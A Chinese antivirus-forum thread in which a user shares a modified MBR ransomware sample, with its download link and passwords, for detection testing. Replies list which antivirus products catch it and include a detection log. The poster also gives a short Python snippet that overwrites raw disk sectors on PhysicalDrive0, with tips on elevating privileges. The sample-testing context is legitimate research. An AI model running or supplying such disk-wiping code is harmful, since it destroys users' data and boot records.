查看: 1610|回复: 16
收起左侧

[病毒样本] MBR勒索

[复制链接]
python无名氏
发表于 2023-2-5 18:37:52 | 显示全部楼层 |阅读模式
本帖最后由 python无名氏 于 2023-2-5 21:09 编辑

快开学了这可能是最后一个了改了一下,勒索信息变了
https://pan.huang1111.cn/s/5qDqSl
密码:threatbook
解锁密码:1145141919810
(密码好臭(悲))

PianoA
发表于 2023-2-5 18:40:58 | 显示全部楼层
金山毒霸kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
paul846586
发表于 2023-2-5 18:41:02 | 显示全部楼层
奇安信miss


wwwab
发表于 2023-2-5 18:41:27 | 显示全部楼层
还以为你用Python能写出来
秋日之殇
发表于 2023-2-5 18:46:03 | 显示全部楼层
事件: 检测到恶意对象
应用程序名称: WinRAR.exe
应用程序路径: D:\WinRAR
组件: 文件反病毒
结果说明: 检测到
类型: 木马
名称: Trojan-Ransom.Win32.Foreign.naew
精确度: 确切
威胁级别: 高
对象类型: 文件
对象名称: da87951c508b1365b01cf897b7656e28fe74e94dcdadd57a178704949b34855d
对象路径: D:\Browerdownload\Compressed\MBRLocker
对象的 MD5: 295649234A333A5A73BE70231DDAB489
原因: 专家分析
数据库发布日期: 今天,2023-02-05 13:16:00
python无名氏
 楼主| 发表于 2023-2-5 18:51:09 | 显示全部楼层
本帖最后由 python无名氏 于 2023-2-5 18:54 编辑
wwwab 发表于 2023-2-5 18:41
还以为你用Python能写出来

python太简单了我二年级就已经做过了,但效果不知道咋样...(python是真的下死手,没密码,改了就回不去力)
wwwab
发表于 2023-2-5 19:03:57 | 显示全部楼层
python无名氏 发表于 2023-2-5 18:51
python太简单了我二年级就已经做过了,但效果不知道咋样...(python是真的下死手,没密码,改了就回 ...

Python能直接修改mbr吗

(批处理命令行没有引入别的东西应该也是修改不了mbr的吧)

不会被编译器拒绝执行敏感代码或者权限不够写入不了吗

用户锁倒是简单应该可以用os.system(net user)
Shake2333
发表于 2023-2-5 19:07:16 | 显示全部楼层
McAfee kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
python无名氏
 楼主| 发表于 2023-2-5 19:12:44 | 显示全部楼层
本帖最后由 python无名氏 于 2023-2-5 19:28 编辑
wwwab 发表于 2023-2-5 19:03
Python能直接修改mbr吗

(批处理命令行没有引入别的东西应该也是修改不了mbr的吧)
  1. disk = open(r'\\.\PhysicalDrive0', 'wb+')
  2. disk.seek(512)
  3. disk.write(b'\x00'*512) #这里也可以换成str转成的信息(str.encode('utf-8'))
  4. disk.close()
复制代码

貌似可以,用的实体机,没试过,也不敢试不过亲测如果是rb+以管理员身份运行是可以读取到的如果借助类似于NSudo的工具应该就可以了,详情可以看https://blog.csdn.net/m0_72347309/article/details/125886929(还可以把\\.\PhysicalDrive0给改成\\.\C:)
Anmoe
发表于 2023-2-5 19:23:02 | 显示全部楼层
BEST Kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-2 14:34 , Processed in 0.123411 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表